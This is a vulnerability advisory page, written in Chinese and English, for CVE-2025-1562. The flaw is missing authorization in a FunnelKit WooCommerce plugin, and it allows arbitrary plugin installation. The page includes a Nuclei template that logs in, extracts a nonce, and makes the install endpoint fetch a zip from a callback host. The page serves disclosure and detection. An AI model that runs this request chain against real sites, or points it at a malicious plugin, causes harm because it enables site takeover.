CVE-2025-1562: Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit - Broken Access Control

日期: 2025-08-01 | 影响软件: WooCommerce | POC: 已公开

漏洞描述

The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_or_activate_addon_plugins() function and a weak nonce hash in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to install arbitrary plugins on the site that can be leveraged to further infect a vulnerable site.

PoC代码[已公开]

id: CVE-2025-1562

info:
  name: Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit - Broken Access Control
  author: s4e-io
  severity: critical
  description: |
    The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_or_activate_addon_plugins() function and a weak nonce hash in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to install arbitrary plugins on the site that can be leveraged to further infect a vulnerable site.
  remediation: |
    Fixed in 3.6.0
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-marketing-automations/recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-353-missing-authorization-to-unauthenticated-arbitrary-plugin-installation
    - https://www.wiz.io/vulnerability-database/cve/cve-2025-1562
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1562
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-1562
    cwe-id: CWE-862
    epss-score: 0.09094
    epss-percentile: 0.92348
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/wp-marketing-automations/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,wp-marketing-automations,wordpress,authenticated,vkev

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=autonami HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-json/autonami-app/plugin/install_and_activate?bwf-nonce={{bwfan_nonce}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"action":"install","url":"http://{{interactsh-url}}/{{randstr}}.zip"}
      # No plugin is uploaded or updated; just sending interactsh-url with randstr

    matchers:
      - type: dsl
        dsl:
          - "contains(body_3, 'incompatible_archive')"
          - "contains(interactsh_protocol, 'http')"
          - "contains(content_type_3, 'application/json')"
          - "status_code_3 == 200"
        condition: and

    extractors:
      - type: regex
        name: bwfan_nonce
        part: body
        internal: true
        regex:
          - "\"bwfan_nonce\"\\s*:\\s*\"([^\"]+)\""
        group: 1
# digest: 4b0a00483046022100ab59f97d39fca2a0d084d5c82170ec8965f59766b817b624fc65a3700c6d86d90221008e7f7f505d414535fa614203dcc028c9a3a6f90fb595be6293564f65ca67c336:922c64590222798bb761d5b6d8e72950

相关漏洞推荐